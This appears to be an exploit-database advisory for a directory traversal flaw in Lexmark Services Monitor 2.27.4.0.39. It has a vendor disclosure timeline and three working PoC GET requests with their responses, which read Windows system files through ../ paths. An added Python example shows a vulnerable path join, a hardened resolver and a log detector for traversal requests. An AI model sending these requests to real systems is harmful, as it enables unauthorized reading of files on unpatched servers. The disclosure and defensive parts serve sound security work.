Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal

Author: Kevin Randall
Platform: hardware
Release date: 2019-11-18

# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : N/A


Vulnerability: Lexmark Services Monitor (version 2.27.4.0.39) listens on TCP port 2070. The latest version is vulnerable to directory traversal and local file inclusion: a GET request whose path contains ../ sequences retrieves files from outside the web root, as the requests below show.

Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019

PoC:

GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536


.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.


GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710

..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".




GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463

# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]
#

echo                7/tcp
echo                7/udp
discard             9/tcp    sink null
discard             9/udp    sink null
systat             11/tcp    users                  #Active users
systat             11/udp    users                  #Active users
daytime            13/tcp
daytime            13/udp
qotd               17/tcp    quote                  #Quote of the day
qotd               17/udp    quote                  #Quote of the day
chargen            19/tcp    ttytst source          #Character generator
chargen            19/udp    ttytst source          #Character generator
ftp-data           20/tcp                           #FTP, data
ftp                21/tcp                           #FTP. control
ssh                22/tcp                           #SSH Remote Login Protocol
telnet             23/tcp
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol
time               37/tcp    timserver
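The three requests above succeed because the rXpress server joins the request path onto its document root and serves whatever the result points at, so the ../ components walk straight out of the web root (the dotted responses are the UTF-16LE content of the .ini files, with each NUL byte rendered as a dot). Since the vendor ships no fix, the practical defences are to confine or retire the service and to alert on such requests. The Python below is an added example, not code from the advisory, from Lexmark or from the rXpress server: it shows the naive join that reproduces the escape, a hardened resolver that refuses it (including percent-encoded and backslash variants), and a check over access-log lines. The document root /srv/lsm/www, the 192.0.2.10 client address and the log lines are constructed; the request targets are the ones from the PoC requests.

```python
"""Confining HTTP request paths to a document root.

Added example; not code from the advisory, from Lexmark or from rXpress.
DOC_ROOT, the client address and LOG_LINES are constructed (assumptions);
the targets in POC_TARGETS are the three from the advisory's PoC requests.
"""
import posixpath
import re
from urllib.parse import unquote

DOC_ROOT = "/srv/lsm/www"  # hypothetical document root (assumption)

# Request targets from the three PoC requests in the advisory.
POC_TARGETS = [
    "/../../../../../../windows/SysWOW64/PerfStringBackup.ini",
    "/../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini",
    "/../../../../../windows/system32/drivers/etc/services",
]


def naive_resolve(root, request_path):
    """The vulnerable pattern: concatenate root and the raw request path.
    normpath collapses the '..' components and the result leaves root."""
    return posixpath.normpath(root + request_path)


def safe_resolve(root, request_path):
    """Hardened resolver. Returns the file path to serve, or None to refuse.

    1. percent-decode once, so '%2e%2e' is seen as '..';
    2. refuse embedded NUL bytes;
    3. treat backslashes as separators: the target is Windows, and a check
       that only looks for '../' would otherwise miss '..\\..\\';
    4. join onto root, normalise, and require the result to stay under root.
    """
    root = posixpath.normpath(root)
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None  # escaped the document root
    return candidate


def check_poc_targets(root=DOC_ROOT):
    """Map each PoC target to (naive result, hardened result)."""
    return {t: (naive_resolve(root, t), safe_resolve(root, t)) for t in POC_TARGETS}


# Detection over access-log lines (constructed, Common Log Format style).
LOG_LINES = [
    '192.0.2.10 - - [15/Nov/2019:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Nov/2019:10:01:05 +0000] "GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1" 200 848536',
    '192.0.2.10 - - [15/Nov/2019:10:01:09 +0000] "GET /%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200 92',
    '192.0.2.10 - - [15/Nov/2019:10:01:12 +0000] "GET /css/../index.html HTTP/1.1" 200 512',
]
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def is_traversal_attempt(target, root=DOC_ROOT):
    """True when the decoded target would not resolve under root."""
    return safe_resolve(root, target.split("?", 1)[0]) is None


def flag_traversal_requests(lines):
    """Return the request targets in the log lines that escape the root,
    i.e. the requests a detection rule should alert on."""
    flagged = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_traversal_attempt(m.group(1)):
            flagged.append(m.group(1))
    return flagged


if __name__ == "__main__":
    for target, (naive, safe) in check_poc_targets().items():
        print(f"{target}\n  naive -> {naive}\n  safe  -> {safe}")
    print("flagged:", flag_traversal_requests(LOG_LINES))
```

Run as a script it prints, for each PoC target, the path the naive join would have served (for the first one, /windows/SysWOW64/PerfStringBackup.ini) beside the hardened resolver's refusal, then the two log lines that escape the root. The log check deliberately leaves /css/../index.html alone because it still resolves under the root; a stricter rule that alerts on any '..' component trades more noise for catching probes that happen to stay inside the root. Note that the responses in the advisory carry status 200 with a large Content-Length, so on a server that cannot be patched, a 200 to a request flagged this way is the signal that the read succeeded.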
Release Date | Title | Type | Platform | Author
2020-03-11 | CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) | remote | windows | Kevin Randall
2020-03-11 | CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) | remote | windows | Kevin Randall
2019-12-17 | Netgear R6400 - Remote Code Execution | webapps | hardware | Kevin Randall
2019-11-18 | Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal | webapps | hardware | Kevin Randall
2019-06-04 | DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) | local | windows | Kevin Randall
2019-04-30 | Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow | remote | windows | Kevin Randall
2019-04-30 | Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow | remote | windows | Kevin Randall
2019-03-26 | Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion | webapps | windows | Kevin Randall
2019-03-13 | Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal | dos | windows | Kevin Randall
2019-03-13 | Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal | dos | windows | Kevin Randall
2018-08-30 | DLink DIR-601 - Credential Disclosure | webapps | hardware | Kevin Randall
2018-04-02 | DLink DIR-601 - Admin Password Disclosure | webapps | hardware | Kevin Randall